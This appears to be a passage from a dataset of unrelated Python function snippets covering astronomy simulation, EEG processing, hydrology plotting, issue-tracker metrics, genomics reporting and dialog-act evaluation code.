assume that the source (and aperture reference location)\n # is located at the given RA, Dec at the start of the first exposure\n base_ra, base_dec = parse_RA_Dec(catalog_table['x_or_RA'].data[0], catalog_table['y_or_Dec'].data[0])\n ra_target = [base_ra]\n dec_target = [base_dec]\n\n ra_vel = catalog_table['x_or_RA_velocity'].data[0]\n dec_vel = catalog_table['y_or_Dec_velocity'].data[0]\n\n # If the source velocity is given in units of pixels/hour, then we need\n # to multiply this by the appropriate pixel scale.\n if vel_in_xy:\n if len(unique_apertures) > 1:\n if inst.lower() == 'nircam':\n det_ints = [int(ele.split('_')[0][-1]) for ele in unique_apertures]\n # If the observation contains NIRCam exposures in both the LW and\n # SW channels, then the source velocity is ambiguous due to the\n # different pixel scales. In that case, raise an exception.\n if np.min(det_ints) < 5 and np.max(det_ints) == 5:\n raise ValueError(('Non-sidereal source {} has no ephemeris file, and a velocity that '\n 'is specified in units of pixels/hour in the source catalog. '\n 'Since observation {} contains NIRCam apertures within both the '\n 'SW and LW channels (which have different pixel scales), '\n 'Mirage does not know which pixel scale to use '\n 'when placing the source.'.format(targ, obs_name)))\n\n # In this case, there is a well-defined pixel scale, so we can translate\n # velocities to units of arcsec/hour\n siaf = pysiaf.Siaf(inst)[unique_apertures[0]]\n ra_vel *= siaf.XSciScale\n dec_vel *= siaf.XSciScale\n\n # Calculate RA, Dec for each exposure given the velocities\n for ob_date in start_dates[1:]:\n delta_time = ob_date - start_dates[0]\n delta_ra = ra_vel * delta_time.total_seconds() / 3600.\n delta_dec = dec_vel * delta_time.total_seconds() / 3600.\n ra_target.append(base_ra + delta_ra)\n dec_target.append(base_dec + delta_dec)\n\n else:\n # Source location comes from the source catalog and is in units of pixels.\n # This can't really be supported, since we don't know which detector the\n # location is for. We could proceed, but Mirage would then put the source\n # pixel (x, y) in every aperture/detector.\n if len(unique_apertures) > 1:\n raise ValueError(('Non-sidereal source {} has no ephemeris file, and a location that '\n 'is specified in units of detector pixels in the source catalog. '\n 'Since observation {} contains multiple apertures (implying different '\n 'coordinate systems), Mirage does not know which coordinate system '\n 'to use when placing the source.'.format(targ, obs_name)))\n\n # If there is only a single aperture associated with the observation,\n # then we can proceed. We first need to translate the given x, y position\n # to RA, Dec\n base_ra, base_dec = aperture_xy_to_radec(catalog_table['x_or_RA'].data[0],\n catalog_table['y_or_Dec'].data[0],\n inst, aperture, fiducial_ra, fiducial_dec, pav3)\n\n\n ra_from_pointing_file[obs_exp_indexes] = ra_target\n dec_from_pointing_file[obs_exp_indexes] = dec_target\n\n self.info['TargetRA'] = ra_from_pointing_file\n self.info['TargetDec'] = dec_from_pointing_file\n\n # Need to update these values (which come from the pointing file)\n # so that below we can adjust them for the different detectors/apertures\n self.info['ra'] = [np.float64(ele) for ele in ra_from_pointing_file]\n self.info['dec'] = [np.float64(ele) for ele in dec_from_pointing_file]\n\n # These go into the pointing in the yaml file\n self.info['ra_ref'] = ra_from_pointing_file\n self.info['dec_ref'] = dec_from_pointing_file", "def compare_analysis_to_golden(log_filename: str, log_file_path: str) -> None:\n\n golden_result_filename = os.path.join(\n log_file_path, '{:s}_golden.json'.format(os.path.splitext(log_filename)[0]))\n\n with TemporaryDirectory() as tmp_dir:\n\n tmp_log_filename = os.path.join(tmp_dir, os.path.basename(log_filename))\n\n os.system('cp {:s} {:s}'.format(log_filename, tmp_log_filename))\n\n assert os.path.exists(tmp_log_filename), '{:s} does not exist.'.format(tmp_log_filename)\n\n process_logdata_ekf(tmp_log_filename, plot=False)\n\n analysis_result_filename = os.path.join(\n tmp_dir, '{:s}.json'.format(os.path.splitext(tmp_log_filename)[0]))\n\n assert os.path.exists(analysis_result_filename), '{:s} does not exist.'.format(\n analysis_result_filename)\n\n with open(analysis_result_filename, 'r') as file:\n analysis_results = json.load(file)\n\n with open(golden_result_filename, 'r') as file:\n golden_results = json.load(file)\n\n print('comparing analysis to golden results')\n\n for local_analysis_check, golden_analysis_check in zip(analysis_results, golden_results):\n print('{:s}'.format(local_analysis_check['type']))\n compare_check_analysis_result_ground_truth(\n local_analysis_check, golden_analysis_check,\n os.path.splitext(os.path.basename(tmp_log_filename))[0])", "def diff(s0, s1):\n from difflib import ndiff\n lst0 = s0.split(\"\\n\")\n lst1 = s1.split(\"\\n\")\n report = '\\n'.join(ndiff(lst0, lst1))\n return report", "def diff(s0, s1):\n from difflib import ndiff\n lst0 = s0.split(\"\\n\")\n lst1 = s1.split(\"\\n\")\n report = '\\n'.join(ndiff(lst0, lst1))\n return report", "def upscaled_rdirs_with_and_without_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):\n\n data_label=\"20170511_230901\"\n ref_label=\"20170507_135726\"\n ref_filename=os.path.join(self.plots_data_dir,\n 'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale'\n '_rdirs_{0}_updated.nc'.format(ref_label))\n data_filename=os.path.join(self.plots_data_dir,\n 'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_data_ALG4_sinkless'\n '_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')\n lsmask_filename=os.path.join(self.plots_data_dir,\n \"ls_mask_extract_ls_mask_from_corrected_\"\n \"HD_rdirs_20160504_142435.nc\")\n corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.plots_data_dir,\n \"rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs\"\n \"_{0}_updated.nc\".format(ref_label))\n upscaled_rdirs_rmouthoutflow_file = os.path.join(self.plots_data_dir,\n \"rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_\"\n \"data_ALG4_sinkless_\"\n \"downscaled_ls_mask_0k_upscale_rdirs_\" + data_label + \"_updated.nc\")\n self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,\n data_flowmap_filename=data_filename,\n ref_catchment_filename=\\\n \"catchmentmap_ICE5G_data_ALG4_\"\n \"sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc\"\\\n .format(ref_label),\n data_catchment_filename=\"catchmentmap_ICE5G_and_tarasov_upscaled_\"\n \"srtm30plus_north_america_only_data_ALG4_sinkless_downscaled_ls_\"\n \"mask_0k_upscale_rdirs_\" + data_label + \"_updated.nc\",\n ref_rdirs_filename=\"upscaled_rdirs_ICE5G_data\"\n \"_ALG4_sinkless_downscaled_\"\n \"ls_mask_0k_upscale_rdirs_{0}_updated.nc\".format(ref_label),\n data_rdirs_filename=None,\n reference_rmouth_outflows_filename=\\\n corrected_hd_rdirs_rmouthoutflow_file,\n data_rmouth_outflows_filename=\\\n upscaled_rdirs_rmouthoutflow_file,\n lsmask_filename=lsmask_filename,\n minflowcutoff=50,flip_data=False,\n rotate_data=True,flip_ref=False,rotate_ref=True,\n lsmask_has_same_orientation_as_ref=False,\n invert_ls_mask=False,\n first_datasource_name=\"Reference\",\n matching_parameter_set='magnitude_extensive',\n use_single_color_for_discrepancies=True,\n second_datasource_name=\"Data\",grid_type='HD')", "def calculate(self, data, *args, **kwargs):\n \n # Sets up priority queue, where data is prioritized by date\n queue = []\n \n # Sets up data dictionaries that will be used to contain calculated data\n severity_data = OrderedDict()\n status_data = OrderedDict()\n current_state = { }\n \n # List of fields used\n fields = [PROJECT, TRANS, STATUS, PRIORITY]\n \n # Populates priority queue with appropriate data\n for key, param_data in data.iteritems():\n # Grabs param_data fields\n priority = param_data.get(PRIORITY, None)\n hist = param_data.get(HIST, None)\n proj = param_data.get(PROJECT, self.project)\n \n # Adds the historical statuses of the current JIRA item to the queue\n if (hist):\n for i, date in enumerate(hist[TRANS]):\n heapq.heappush(queue, (date, proj, key, hist[NEW][i], priority))\n \n # Iterates through dates to populate status and severity data dictionaries\n if (queue):\n earliest = queue[0][0]\n for date in get_historical_dates(earliest, self.extraction_day, False):\n # Pops items off queue until queue is empty or date limit is reached\n while(queue and queue[0][0].date() <= date):\n curr, proj, key, status, priority = heapq.heappop(queue)\n \n # Maps the key's current parameters, overwriting previous mapping\n current_state[key] = { }\n for field, value in zip(fields, [proj, curr, status, priority]):\n current_state[key][field] = value\n \n # Sets severity and status metric data at the given date\n severity_data[date] = self._get_severity_data(current_state)\n status_data[date] = self._get_status_data(current_state)\n \n # Gets age data separately from status and severity\n age_map = self._get_average_age_data(data)\n \n return severity_data, status_data, age_map", "def calculate_diagnostic_vars(self):\n pass", "def perform_reference(self):\n # Phase 1: Estimate the true signal mean with robust referencing\n self.robust_reference()\n if self.noisy_channels[\"bad_all\"]:\n self.raw.info[\"bads\"] = self.noisy_channels[\"bad_all\"]\n self.raw.interpolate_bads()\n self.reference_signal = (\n np.nanmean(self.raw.get_data(picks=self.reference_channels), axis=0) * 1e6\n )\n rereferenced_index = [\n self.ch_names_eeg.index(ch) for ch in self.rereferenced_channels\n ]\n self.EEG = self.remove_reference(\n self.EEG, self.reference_signal, rereferenced_index\n )\n\n # Phase 2: Find the bad channels and interpolate\n self.raw._data = self.EEG * 1e-6\n noisy_detector = NoisyChannels(self.raw)\n noisy_detector.find_all_bads(ransac=self.ransac)\n\n # Record Noisy channels and EEG before interpolation\n self.bad_before_interpolation = noisy_detector.get_bads(verbose=True)\n self.EEG_before_interpolation = self.EEG.copy()\n\n bad_channels = _union(self.bad_before_interpolation, self.unusable_channels)\n self.raw.info[\"bads\"] = bad_channels\n self.raw.interpolate_bads()\n reference_correct = (\n np.nanmean(self.raw.get_data(picks=self.reference_channels), axis=0) * 1e6\n )\n self.EEG = self.raw.get_data() * 1e6\n self.EEG = self.remove_reference(\n self.EEG, reference_correct, rereferenced_index\n )\n # reference signal after interpolation\n self.reference_signal_new = self.reference_signal + reference_correct\n # MNE Raw object after interpolation\n self.raw._data = self.EEG * 1e-6\n\n # Still noisy channels after interpolation\n self.interpolated_channels = bad_channels\n noisy_detector = NoisyChannels(self.raw)\n noisy_detector.find_all_bads(ransac=self.ransac)\n self.still_noisy_channels = noisy_detector.get_bads()\n self.raw.info[\"bads\"] = self.still_noisy_channels\n return self", "def lf_abnormal_interp_with_slowing(report):\n if 'interpretation' in report.sections.keys():\n interpretation = report.sections['interpretation']\n interp_text = interpretation['text']\n return abnormal_interp_with_slowing(interp_text)\n elif 'summary' in report.sections:\n return abnormal_interp_with_slowing(report.sections['summary']['text'])\n elif 'findings' in report.sections: # fall back to look in the findings \n if 'summary' in report.sections['findings']: # fall back to look for a summary instead\n return abnormal_interp_with_slowing(report.sections['findings']['summary'])\n if 'impression' in report.sections['findings']:\n return abnormal_interp_with_slowing(report.sections['findings']['impression'])\n return ABSTAIN_VAL\n elif 'narrative' in report.sections: # fall back to look in the findings \n ky = 'narrative'\n if 'summary' in report.sections[ky]: # fall back to look for a summary instead\n return abnormal_interp_with_slowing(report.sections[ky]['summary'])\n if 'impression' in report.sections[ky]:\n return abnormal_interp_with_slowing(report.sections[ky]['impression'])\n # could try running on all of findings but would really need to check then\n \n return ABSTAIN_VAL \n else:\n return ABSTAIN_VAL", "def get_files_diff(self, current_files_data):\n if self.saved_files_data:\n saved_files_paths, saved_files_hashes = zip(*self.saved_files_data.items())\n else:\n saved_files_paths, saved_files_hashes = [], []\n if current_files_data:\n current_files_paths, current_files_hashes = zip(*current_files_data.items())\n else:\n current_files_paths, current_files_hashes = [], []\n\n missing_files_paths = list(set(saved_files_paths).difference(set(current_files_paths)))\n missing_files_hashes = [self.saved_files_data[path] for path in missing_files_paths]\n added_files_paths = list(set(current_files_paths).difference(set(saved_files_paths)))\n added_files_hashes = [current_files_data[path] for path in added_files_paths]\n\n # get moved files paths\n moved_files_hashes = list(set(missing_files_hashes).intersection(set(added_files_hashes)))\n moved_files_paths = [\n json.dumps({\n 'from': self.get_file_path_by_hash(self.saved_files_data, hash_),\n 'to': self.get_file_path_by_hash(current_files_data, hash_)\n }) for hash_ in moved_files_hashes\n ]\n\n # get missing files paths\n missing_files_paths = [ # remove \"moved\" files paths\n self.get_file_path_by_hash(self.saved_files_data, hash_)\n for hash_ in missing_files_hashes if hash_ not in moved_files_hashes\n ]\n\n # get added files paths\n added_files_paths = [ # remove \"moved\" files paths\n self.get_file_path_by_hash(current_files_data, hash_)\n for hash_ in added_files_hashes if hash_ not in moved_files_hashes\n ]\n\n # get edited files paths\n remained_files_paths = list(set(saved_files_paths).intersection(set(current_files_paths)))\n for file_path in remained_files_paths:\n if self.saved_files_data[file_path] != current_files_data[file_path]: # compare hashes\n missing_files_paths.append(file_path)\n added_files_paths.append(file_path)\n\n if any([missing_files_paths, added_files_paths, moved_files_paths]):\n self.saved_files_data = current_files_data\n\n return missing_files_paths, added_files_paths, moved_files_paths", "def report_unknown_indel_results(allele1, allele2, \\\n five_prime_diff, five_prime_variant_len, three_prime_diff, three_prime_variant_len):\n \n if five_prime_diff == 'error - cannot compare' or three_prime_diff == 'error - cannot compare':\n relative_sequence_alignment = '{} and {} cannot be compared using the MSF file'.format(allele1, allele2)\n return relative_sequence_alignment\n \n if five_prime_diff == 'deletion':\n if three_prime_diff == 'deletion':\n relative_sequence_alignment = \"{} is a superset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len)\n\n elif three_prime_diff == 'insertion':\n relative_sequence_alignment = \"{} has a staggered 3' end overlap with {}; 5' end {}bp overhang; 3' {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'no diff':\n relative_sequence_alignment = \"{} is a superset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif five_prime_diff == 'insertion':\n if three_prime_diff == 'insertion':\n relative_sequence_alignment = \"{} is a subset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'deletion':\n relative_sequence_alignment = \"{} has a staggered 5' end overlap with {}; 5' {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'no diff':\n relative_sequence_alignment = \"{} is a subset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n \n elif five_prime_diff == 'no diff':\n if three_prime_diff == 'deletion':\n relative_sequence_alignment = \"{} is a superset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'insertion':\n relative_sequence_alignment = \"{} is a subset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'no diff':\n relative_sequence_alignment = \"{} is aligned with {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n\n\n \n return relative_sequence_alignment", "def lint(self):\n report = OrderedDict()\n\n for index, slice in self.slices.iterrows():\n inputs, outputs = create_activations(slice)\n inf = inputs[0].format[:4]\n outf = outputs[0].format[:4]\n if inf != outf:\n mitigation = \"\"\n if \"INT8\" in [inf, outf]:\n mitigation = \"Consider adding quantization around float operations.\"\n report[slice.Name] = OrderedDict({\n 'name': slice.Name,\n 'type conversion': f\"{inf} -> {outf}\",\n 'shape conversion': f\"{inputs[0].shape} -> {outputs[0].shape}\",\n 'hazard': \"Slice layer is converting operand data type.\",\n 'mitigation': mitigation,\n 'help': \"Conversions between float32 and float16 are a red \"\n \"flag, as are conversions between float32/16 <=> INT8.\"\n })\n\n df = pd.DataFrame.from_dict(report, orient='index')\n return df", "def compute(cls, observation, prediction, distances):\n\n errors = collections.OrderedDict()\n\n for i in range (0, len(distances)):\n if 'mean_AP1_amp_strong_propagating_at_'+str(distances[i])+'um' in observation.keys() or 'mean_AP1_amp_weak_propagating_at_'+str(distances[i])+'um' in observation.keys():\n p_value = prediction['model_AP1_amp_at_'+str(distances[i])+'um']['mean']\n o_mean = observation['mean_AP1_amp_strong_propagating_at_'+str(distances[i])+'um']\n o_std = observation['std_AP1_amp_strong_propagating_at_'+str(distances[i])+'um']\n\n try:\n error = abs(p_value - o_mean)/o_std\n error = assert_dimensionless(error)\n except (TypeError,AssertionError) as e:\n error = e\n errors['AP1_amp_strong_propagating_at_'+str(distances[i])] = error\n\n\n o_mean = observation['mean_AP1_amp_weak_propagating_at_'+str(distances[i])+'um']\n o_std = observation['std_AP1_amp_weak_propagating_at_'+str(distances[i])+'um']\n\n try:\n error = abs(p_value - o_mean)/o_std\n error = assert_dimensionless(error)\n except (TypeError,AssertionError) as e:\n error = e\n errors['AP1_amp_weak_propagating_at_'+str(distances[i])] = error\n\n else:\n p_value = prediction['model_AP1_amp_at_'+str(distances[i])+'um']['mean']\n o_mean = observation['mean_AP1_amp_at_'+str(distances[i])+'um']\n o_std = observation['std_AP1_amp_at_'+str(distances[i])+'um']\n\n try:\n error = abs(p_value - o_mean)/o_std\n error = assert_dimensionless(error)\n except (TypeError,AssertionError) as e:\n error = e\n errors['AP1_amp_at_'+str(distances[i])] = error\n\n for i in range (0, len(distances)): # to keep better order: first all AP1, then all APlast\n p_value_l = prediction['model_APlast_amp_at_'+str(distances[i])+'um']['mean']\n o_mean_l = observation['mean_APlast_amp_at_'+str(distances[i])+'um']\n o_std_l = observation['std_APlast_amp_at_'+str(distances[i])+'um']\n\n try:\n error_l = abs(p_value_l - o_mean_l)/o_std_l\n error_l = assert_dimensionless(error_l)\n except (TypeError,AssertionError) as e:\n error_l = e\n errors['APlast_amp_at_'+str(distances[i])] = error_l\n\n score_sum_strong_propagating = 0.0\n score_sum_weak_propagating = 0.0\n\n for key, value in errors.iteritems():\n if 'strong' not in key:\n score_sum_weak_propagating += value\n for key, value in errors.iteritems():\n if 'weak' not in key:\n score_sum_strong_propagating += value\n return [score_sum_strong_propagating, score_sum_weak_propagating], errors", "def _get_diff2_data(request, ps_left_id, ps_right_id, patch_id, context,\n column_width, patch_filename=None):\n ps_left = models.PatchSet.get_by_id(int(ps_left_id), parent=request.issue.key)\n if ps_left is None:\n return HttpTextResponse(\n 'No patch set exists with that id (%s)' % ps_left_id, status=404)\n ps_left.issue_key = request.issue.key\n ps_right = models.PatchSet.get_by_id(\n int(ps_right_id), parent=request.issue.key)\n if ps_right is None:\n return HttpTextResponse(\n 'No patch set exists with that id (%s)' % ps_right_id, status=404)\n ps_right.issue_key = request.issue.key\n if patch_id is not None:\n patch_right = models.Patch.get_by_id(int(patch_id), parent=ps_right.key)\n else:\n patch_right = None\n if patch_right is not None:\n patch_right.patchset_key = ps_right.key\n if patch_filename is None:\n patch_filename = patch_right.filename\n # Now find the corresponding patch in ps_left\n patch_left = models.Patch.query(\n models.Patch.patchset_key == ps_left.key,\n models.Patch.filename == patch_filename).get()\n\n if patch_left:\n try:\n new_content_left = patch_left.get_patched_content()\n except FetchError as err:\n return HttpTextResponse(str(err), status=404)\n lines_left = new_content_left.lines\n elif patch_right:\n lines_left = patch_right.get_content().lines\n else:\n lines_left = []\n\n if patch_right:\n try:\n new_content_right = patch_right.get_patched_content()\n except FetchError as err:\n return HttpTextResponse(str(err), status=404)\n lines_right = new_content_right.lines\n elif patch_left:\n lines_right = patch_left.get_content().lines\n else:\n lines_right = []\n\n rows = engine.RenderDiff2TableRows(request,\n lines_left, patch_left,\n lines_right, patch_right,\n context=context,\n colwidth=column_width)\n rows = list(rows)\n if rows and rows[-1] is None:\n del rows[-1]\n\n return dict(patch_left=patch_left, patch_right=patch_right,\n ps_left=ps_left, ps_right=ps_right, rows=rows)", "def analyze_prior_results(self, analysis_source):\n #TODO: move to iota_run.py\n\n from iota.components.iota_analysis import Analyzer\n from libtbx import easy_pickle as ep\n\n if os.path.isdir(analysis_source):\n int_folder = os.path.abspath(analysis_source)\n else:\n try:\n int_folder = os.path.abspath(os.path.join(os.curdir,\n 'integration/{}/image_objects'.format(analysis_source)))\n except ValueError:\n int_folder = None\n print ('Run #{} not found'.format(analysis_source))\n\n if os.path.isdir(int_folder):\n with prog_message('Analyzing Results'):\n int_list = [os.path.join(int_folder, i) for i in os.listdir(int_folder)]\n img_objects = [ep.load(i) for i in int_list if i.endswith('.int')]\n\n self.logfile = os.path.abspath(os.path.join(int_folder, 'iota.log'))\n self.viz_base = os.path.join('/'.join(int_folder.split('/')),\n 'vizualization')\n\n self.params.analysis.cluster_write_files=False\n\n analysis = Analyzer(self, img_objects, self.iver)\n analysis.print_results()\n analysis.unit_cell_analysis()\n analysis.print_summary(write_files=False)\n else:\n print ('No results found in {}'.format(int_folder))", "def _restore_sampler_from_reporter(self, reporter):\n # Read the last iteration reported to ensure we don't include junk\n # data written just before a crash.\n logger.debug(\"Reading storage file {}...\".format(reporter.filepath))\n metadata = reporter.read_dict('metadata')\n thermodynamic_states, unsampled_states = reporter.read_thermodynamic_states()\n\n def _read_options(check_iteration):\n internal_sampler_states = reporter.read_sampler_states(iteration=check_iteration)\n internal_state_indices = reporter.read_replica_thermodynamic_states(iteration=check_iteration)\n internal_energy_thermodynamic_states, internal_neighborhoods, internal_energy_unsampled_states = \\\n reporter.read_energies(iteration=check_iteration)\n internal_n_accepted_matrix, internal_n_proposed_matrix = \\\n reporter.read_mixing_statistics(iteration=check_iteration)\n\n # Search for last cached free energies only if online analysis is activated.\n internal_last_mbar_f_k, internal_last_err_free_energy = None, None\n if self.online_analysis_interval is not None:\n online_analysis_info = self._read_last_free_energy(reporter, check_iteration)\n try:\n internal_last_mbar_f_k, (_, internal_last_err_free_energy) = online_analysis_info\n except TypeError:\n # Trap case where online analysis is set but not run yet and (_, ...) = None is not iterable\n pass\n return (internal_sampler_states, internal_state_indices, internal_energy_thermodynamic_states,\n internal_neighborhoods, internal_energy_unsampled_states, internal_n_accepted_matrix,\n internal_n_proposed_matrix, internal_last_mbar_f_k, internal_last_err_free_energy)\n\n # Keep trying to resume further and further back from the most recent checkpoint back\n checkpoints = reporter.read_checkpoint_iterations()\n checkpoint_reverse_iter = iter(checkpoints[::-1])\n while True:\n try:\n checkpoint = next(checkpoint_reverse_iter)\n output_data = _read_options(checkpoint)\n # Found data, can escape loop\n break\n except StopIteration:\n raise self._throw_restoration_error(\"Attempting to restore from any checkpoint failed. \"\n \"Either your data is fully corrupted or something has gone very \"\n \"wrong to see this message. \"\n \"Please open an issue on the GitHub issue tracker if you see this!\")\n except Exception as err:\n raise err\n # Trap all other errors caught by the load process\n continue\n\n if checkpoint < checkpoints[-1]:\n logger.warning(\"Could not use most recent checkpoint at {}, instead pulled from {}\".format(checkpoints[-1],\n checkpoint))\n (sampler_states, state_indices, energy_thermodynamic_states, neighborhoods, energy_unsampled_states,\n n_accepted_matrix, n_proposed_matrix, last_mbar_f_k, last_err_free_energy) = output_data\n # Assign attributes.\n self._iteration = int(checkpoint) # The int() can probably be removed when pinned to NetCDF4 >=1.4.0\n self._thermodynamic_states = thermodynamic_states\n self._unsampled_states = unsampled_states\n self._sampler_states = sampler_states\n self._replica_thermodynamic_states = np.array(state_indices)\n self._energy_thermodynamic_states = energy_thermodynamic_states\n self._neighborhoods = neighborhoods\n self._energy_unsampled_states = energy_unsampled_states\n self._n_accepted_matrix = np.array(n_accepted_matrix)\n self._n_proposed_matrix = np.array(n_proposed_matrix)\n self._metadata = metadata\n\n self._last_mbar_f_k = last_mbar_f_k\n self._last_err_free_energy = last_err_free_energy\n\n # initialize timing dictionary\n self._timing_data = dict()\n\n # Initialize context caches\n self._initialize_context_caches()", "def check_file_locations(store: dict[str, Any]) -> ValidationStepResult:\n success: bool = True\n filtered_files: dict[PullRequestFileType, list[File]] = (\n store[\"filtered_files\"]\n )\n all_labels: dict[str, Label] = store[\"possible_labels\"]\n labels: set[Label] = set()\n comments: list[str] = []\n errors: dict[os.PathLike, list[str]] = {}\n\n forecast_folder_name = store[\"FORECAST_FOLDER_NAME\"]\n logger.info(\n f\"Checking if the PR is updating outside the {forecast_folder_name}/ folder...\"\n )\n if (\n PullRequestFileType.OTHER_NONFS in filtered_files or\n PullRequestFileType.OTHER_FS in filtered_files\n ):\n logger.info((\n \"⚠️ PR contains file changes that are not part of a valid \"\n \"forecast submission (misnamed/misplaced forecast CSV, \"\n \"non CSV files, etc.)\"\n ))\n comments.append(\n \"⚠️ PR contains file changes that are not part of a valid \"\n \"forecast submission (misnamed/misplaced forecast CSV, \"\n \"non CSV files, etc.)\"\n )\n labels.add(all_labels[\"other-files-updated\"])\n\n if (\n PullRequestFileType.MODEL_OTHER_FS in filtered_files \n ):\n success = False\n logger.info((\n \"❌ PR contains files submitted in the model folder that are not part of a valid \"\n \"forecast submission\"\n ))\n comments.append(\n \"❌ PR contains files submitted in the model folder that are not part of a valid \"\n \"forecast submission\"\n )\n \n else:\n logger.info((\n \"✔️ PR does not contain file changes that are not part of a \"\n \"valid forecast submission (misnamed/misplaced forecast CSV, \"\n \"non CSV files, etc.)\"\n ))\n\n logger.info(\"Checking if the PR contains misplaced CSVs...\")\n submission_formatting_instruction = store[\"SUBMISSION_FORMATTING_INSTRUCTION\"]\n\n if (PullRequestFileType.FORECAST not in filtered_files and\n PullRequestFileType.OTHER_FS in filtered_files):\n success = False\n logger.info(\"❌ PR contains misplaced CSVs.\")\n for github_file in filtered_files[PullRequestFileType.OTHER_FS]:\n path = pathlib.Path(github_file.filename)\n errors[path] = [(\n \"The forecast CSV or metadata file is located in an \"\n \"incorrect location and/or is misnamed (see \"\n f\"[here]({submission_formatting_instruction})\"\n \" for submission instructions. Please correct the errors \"\n \"accordingly.\\n\"\n \"We will still check any misplaced CSV(s) for \"\n \"you, so that you can be sure that the CSVs are correct, \"\n \"or correct any actual file content validation errors if \"\n \"not.\"\n )]\n else:\n logger.info(\"✔️ PR does not contain misplaced forecasts\")\n\n logger.info(\"Checking if the PR contains metadata updates...\")\n if PullRequestFileType.METADATA in filtered_files:\n logger.info(\"💡 PR contains metadata updates\")\n comments.append(\"💡 PR contains metadata file changes.\")\n labels.add(all_labels[\"metadata-change\"])\n\n return ValidationStepResult(\n success=success,\n labels=labels,\n comments=comments,\n file_errors=errors\n )", "def log_diff(template_index, exists_in_source, source_row, exists_in_dest,\n dest_row):\n\n template = nori.core.cfg['templates'][template_index]\n\n if nori.core.cfg['report_order'] == 'template':\n if template_index not in diff_dict:\n diff_dict[template_index] = []\n diff_dict[template_index].append((exists_in_source, source_row,\n exists_in_dest, dest_row, None))\n diff_k = template_index\n diff_i = len(diff_dict[template_index]) - 1\n elif nori.core.cfg['report_order'] == 'keys':\n keys_str = ()\n if source_row is not None:\n num_keys = source_row[0]\n source_data = source_row[1]\n keys_tuple = source_data[0:num_keys]\n elif dest_row is not None:\n num_keys = dest_row[0]\n dest_data = dest_row[1]\n keys_tuple = dest_data[0:num_keys]\n if keys_tuple not in diff_dict:\n diff_dict[keys_tuple] = []\n diff_dict[keys_tuple].append((template_index, exists_in_source,\n source_row, exists_in_dest, dest_row,\n None))\n diff_k = keys_tuple\n diff_i = len(diff_dict[keys_tuple]) - 1\n\n if exists_in_source:\n source_str = nori.pps(source_row[1])\n elif exists_in_source is None:\n source_str = '[no value match in source database]'\n else:\n source_str = '[no key match in source database]'\n if exists_in_dest:\n dest_str = nori.pps(dest_row[1])\n elif exists_in_dest is None:\n dest_str = '[no value match in destination database]'\n else:\n dest_str = '[no key match in destination database]'\n\n nori.core.status_logger.info(\n 'Diff found for template {0} ({1}):\\nS: {2}\\nD: {3}' .\n format(template_index, nori.pps(template[T_NAME_KEY]),\n source_str, dest_str)\n )\n return (diff_k, diff_i)", "def analyze_frame(idx,true_frame, pred_frame):\n global total_act\n global total_correct\n global acts \n global k \n global slots\n global wrong_act_wrong_slot\n global right_act_wrong_slot\n global right_act_right_slot\n global wrong_act_right_slot\n # Compare Dialog Actss\n flag = 0 \n true_act = true_frame['act'] if 'act' in true_frame else None\n pred_act = pred_frame['act'] if 'act' in pred_frame else None\n\n true_act_split = true_act.split(\":\")\n true_act_simple = true_act_split[1] \n true_act_detail = ':'.join(true_act_split[2:])\n\n if pred_act is None : \n wrong_act_wrong_slot.add(idx)\n return None \n pred_act_split = pred_act.split(\":\")\n if pred_act != \"ERR:CHITCHAT\" and pred_act != \"ERR:MISSING_CONTEXT\" and len(pred_act_split) < 3 : \n wrong_act_wrong_slot.add(idx)\n return None \n pred_act_simple = pred_act_split[1] \n pred_act_detail = ':'.join(pred_act_split[2:])\n #ipdb.set_trace(context=20) \n if true_act_simple in acts : \n acts[true_act_simple]['total'] = acts[true_act_simple]['total'] + 1\n if true_act_detail in acts[true_act_simple]['detail'] : ## already exists\n acts[true_act_simple]['detail'][true_act_detail]['total'] += 1\n else : \n if not acts[true_act_simple]['detail'].get(true_act_detail) : \n acts[true_act_simple]['detail'][true_act_detail] = {\n 'total' : 1,\n 'correct' : 0,\n 'all-wrong' : {\n\n },\n 'part-wrong' : {\n\n } \n }\n else :\n acts[true_act_simple] = {\n 'total' : 1,\n 'correct' : 0,\n 'detail' : {\n\n }\n }\n acts[true_act_simple]['detail'][true_act_detail] = {\n 'total' : 1,\n 'correct' : 0,\n 'all-wrong' : {\n\n },\n 'part-wrong' : {\n\n } \n }\n \n if true_act == pred_act : ## Act correctly predicted \n flag = 1\n right_act_right_slot.add(idx)\n total_correct = total_correct + 1\n total_act = total_act + 1 \n acts[true_act_simple]['correct'] += 1\n if acts[true_act_simple]['detail'].get(true_act_detail) is None : \n acts[true_act_simple]['detail'][true_act_detail]['correct'] = 1\n else : \n acts[true_act_simple]['detail'][true_act_detail]['correct'] = acts[true_act_simple]['detail'][true_act_detail]['correct'] + 1\n else : \n\n total_act = 